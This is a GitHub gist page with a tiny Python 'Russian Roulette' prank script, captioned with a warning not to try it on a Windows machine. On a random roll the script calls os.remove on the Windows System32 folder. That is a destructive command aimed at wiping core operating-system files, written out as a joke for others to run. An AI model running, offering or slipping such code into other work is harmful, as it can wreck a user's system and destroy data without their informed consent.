Created
December 27, 2024 04:56
-
-
Save gensart-x/4d213d2bb0cdaf73521ac8857da62710 to your computer and use it in GitHub Desktop.
Don't try in Windows machine, Russian Roullete
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
import os | |
if random.randint(0, 6) == 1: | |
os.remove("C:\Windows\System32") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment